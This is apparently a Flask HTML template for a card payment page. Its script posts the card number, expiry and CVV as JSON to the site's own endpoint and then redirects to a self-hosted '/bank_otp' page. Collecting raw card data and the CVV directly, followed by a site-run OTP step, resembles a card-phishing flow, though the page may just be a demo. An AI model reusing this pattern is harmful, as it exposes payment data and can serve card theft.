<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Card Payment</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='card_payment.css') }}">
    <link rel="icon" type="image/x-icon" href="{{ url_for('static', filename='favicon.ico') }}">
</head>
<body>
    <div class="container">
        <h1>Card Payment</h1>
        <form id="card-payment-form" method="POST" action="/submit_card_payment">
            <label for="card_number">Card Number:</label>
            <input type="text" id="card_number" name="card_number" placeholder="Enter card number" required><br><br>

            <label for="expiry_date">Expiry Date:</label>
            <input type="text" id="expiry_date" name="expiry_date" placeholder="MM/YYYY" required><br><br>

            <label for="cvv">CVV:</label>
            <input type="text" id="cvv" name="cvv" placeholder="Enter CVV" required><br><br>

            <button type="submit">Submit Payment</button>
        </form>
    </div>

    <script>
        document.getElementById('card-payment-form').addEventListener('submit', function(event) {
            event.preventDefault();  // Prevent default form submission

            // Fetch form data
            const formData = new FormData(document.getElementById('card-payment-form'));
            const cardNumber = formData.get('card_number');
            const expiryDate = formData.get('expiry_date');
            const cvv = formData.get('cvv');

            // Example of form validation (you might want to improve this)
            if (!cardNumber || !expiryDate || !cvv) {
                alert('Please fill in all required fields.');
                return;
            }

            // Perform AJAX request to submit card payment
            fetch('/submit_card_payment', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    card_number: cardNumber,
                    expiry_date: expiryDate,
                    cvv: cvv,
                }),
            })
            .then(response => response.json())
            .then(data => {
                // If successful, redirect to bank_otp page
                window.location.href = '/bank_otp';
            })
            .catch(error => {
                console.error('Error:', error);
                alert('Failed to process payment. Please try again later.');
            });
        });
    </script>
</body>
</html>
